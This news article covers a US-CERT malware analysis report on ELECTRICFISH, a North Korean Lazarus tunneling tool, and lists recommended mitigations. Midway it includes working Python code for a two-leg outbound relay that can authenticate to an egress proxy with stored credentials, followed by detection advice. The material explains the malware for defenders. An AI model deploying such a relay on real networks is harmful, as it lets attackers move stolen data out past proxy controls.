North Korean Hackers Use ELECTRICFISH Malware to Steal Data. The Federal Bureau of Investigation (FBI) and the U.S. Department of Homeland Security (DHS) have issued a joint malware analysis report (MAR) on a malware strain dubbed ELECTRICFISH, used by the North Korean APT group Lazarus to exfiltrate data from victims.

According to the MAR AR19-129A advisory released on US-CERT’s website, the malware was detected while tracking the malicious activities of the North Korean-backed hacking group HIDDEN COBRA (also known by security experts as Lazarus, Guardians of Peace, ZINC, and NICKEL ACADEMY).

The MAR-10135536-21 malware analysis report was issued “to enable network defense and reduce exposure to North Korean government malicious cyber activity.”

As further detailed in the advisory:

This MAR includes malware descriptions related to HIDDEN COBRA, suggested response actions and recommended mitigation techniques. Users or administrators should flag activity associated with the malware and report the activity to the Cybersecurity and Infrastructure Security Agency (CISA) or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation.

The report published on the US-CERT website comes with a detailed analysis of one malicious 32-bit executable file identified as Lazarus’ ELECTRICFISH malware.

The malware “implements a custom protocol that allows traffic to be funneled between a source and a destination Internet Protocol (IP) address. The malware continuously attempts to reach out to the source and the destination system, which allows either side to initiate a funneling session.”


Because the Lazarus operators can configure the malware “with a proxy server/port and proxy username and password,” it can reach “a system sitting inside of a proxy server.” The security-relevant point is what those credentials buy the attacker: an egress proxy that requires authentication would normally stop an unauthenticated outbound connection from the compromised host, but ELECTRICFISH carries the proxy username and password with it, so it satisfies the proxy’s authentication requirement and gets out of the network. It is the proxy’s authentication that is bypassed, not a logon on the infected system itself.

Once it has authenticated to the configured proxy, ELECTRICFISH will “establish a session with the destination IP address, located outside of the target network and the source IP address.”

Once connections to both the source IP address and the destination IP address are established, ELECTRICFISH funnels traffic between the two machines. Because the implant opens both legs itself, the attackers can relay information collected from compromised computers inside the network to servers they control outside it.
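To make the two mechanisms above concrete, the following is an added illustration in Python; it is not code from the MAR and not the ELECTRICFISH sample, whose relay protocol is custom and not reproduced here. It shows a relay that opens both legs outbound and pumps bytes between them (so whichever side speaks first is forwarded and nothing listens on the host), and an HTTP CONNECT handshake that presents a configured username and password to an egress proxy. The MAR does not say which proxy protocol the sample speaks; HTTP CONNECT with Basic credentials, the address 203.0.113.10 and the user/pass pair are assumptions made for illustration.

```python
"""Added illustration of an outbound-only relay plus proxy-authenticated
egress. Not the ELECTRICFISH code; HTTP CONNECT with Basic credentials is an
assumption, since the MAR does not name the proxy protocol."""
import base64
import select
import socket
from typing import Optional, Tuple


def build_connect_request(host: str, port: int, username: Optional[str] = None,
                          password: Optional[str] = None) -> bytes:
    """Build an HTTP/1.1 CONNECT request. When credentials are configured the
    Proxy-Authorization header is what lets the implant through a proxy that
    rejects unauthenticated outbound connections."""
    lines = [f"CONNECT {host}:{port} HTTP/1.1", f"Host: {host}:{port}"]
    if username is not None:
        token = base64.b64encode(f"{username}:{password or ''}".encode()).decode()
        lines.append(f"Proxy-Authorization: Basic {token}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def connect_accepted(response: bytes) -> bool:
    """True when the proxy's status line is 2xx (tunnel open); a 407 means it
    wants, or rejected, credentials."""
    parts = response.split(b"\r\n", 1)[0].split()
    return len(parts) >= 2 and parts[0].startswith(b"HTTP/") and parts[1].startswith(b"2")


def establish_proxy_tunnel(proxy_sock: socket.socket, host: str, port: int,
                           username: Optional[str] = None,
                           password: Optional[str] = None) -> bool:
    """On an already-connected proxy socket, ask for a tunnel to host:port.
    After a 2xx reply the same socket carries raw bytes to host:port."""
    proxy_sock.sendall(build_connect_request(host, port, username, password))
    response = b""
    while b"\r\n\r\n" not in response:
        chunk = proxy_sock.recv(4096)
        if not chunk:  # proxy hung up before completing its reply
            return False
        response += chunk
    return connect_accepted(response)


def pump(left: socket.socket, right: socket.socket, bufsize: int = 4096) -> Tuple[int, int]:
    """Relay bytes in both directions until either peer closes.

    This is the 'funnel': the relay owns both sockets, both were opened
    outbound, and data arriving on either leg is forwarded to the other, so
    either end can initiate a session. Returns (bytes left->right, bytes right->left).
    """
    sent_lr = sent_rl = 0
    while True:
        readable, _, _ = select.select([left, right], [], [])
        for src in readable:
            data = src.recv(bufsize)
            if not data:  # EOF on one leg tears down the whole tunnel
                return sent_lr, sent_rl
            if src is left:
                right.sendall(data)
                sent_lr += len(data)
            else:
                left.sendall(data)
                sent_rl += len(data)


def funnel(source: Tuple[str, int], destination: Tuple[str, int],
           proxy: Optional[Tuple[str, int]] = None,
           username: Optional[str] = None,
           password: Optional[str] = None) -> Tuple[int, int]:
    """Connect out to both ends, the external one through the proxy when one
    is configured, and relay until either side closes (live network call)."""
    src_sock = socket.create_connection(source, timeout=10)
    if proxy:
        dst_sock = socket.create_connection(proxy, timeout=10)
        if not establish_proxy_tunnel(dst_sock, destination[0], destination[1],
                                      username, password):
            src_sock.close()
            dst_sock.close()
            raise ConnectionError(f"proxy refused CONNECT to {destination[0]}:{destination[1]}")
    else:
        dst_sock = socket.create_connection(destination, timeout=10)
    try:
        return pump(src_sock, dst_sock)
    finally:
        src_sock.close()
        dst_sock.close()
```

What a defender should take from this: the relay host never listens, so inventory and port scans show nothing, and the only network-visible behaviour is a host that keeps reconnecting outbound to the same two endpoints and, where a proxy is in the path, a CONNECT request carrying a stored username and password. Proxy logs that show a workstation or service account authenticating to the proxy for long-lived tunnels to a single external IP and port, or repeating the attempt in a loop when it fails, are the place to look.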

Malware analysis reports are issued by the DHS via US-CERT to “provide organizations with more detailed malware analysis acquired via manual reverse engineering.”

Full analysis of the ELECTRICFISH sample, together with a full list of IOCs, is available in the AR19-129A advisory. The IOCs can also be downloaded from US-CERT as an XML document.

How to avoid infection

Aside from keeping antivirus signatures up to date, the advisory recommends that users and administrators:

  • keep operating systems patched and restrict users’ permissions to install and run unwanted software;
  • think twice before opening email attachments and be cautious when using removable media;
  • disable file- and printer-sharing services, or, where they are required, protect them with strong passwords or Active Directory authentication.
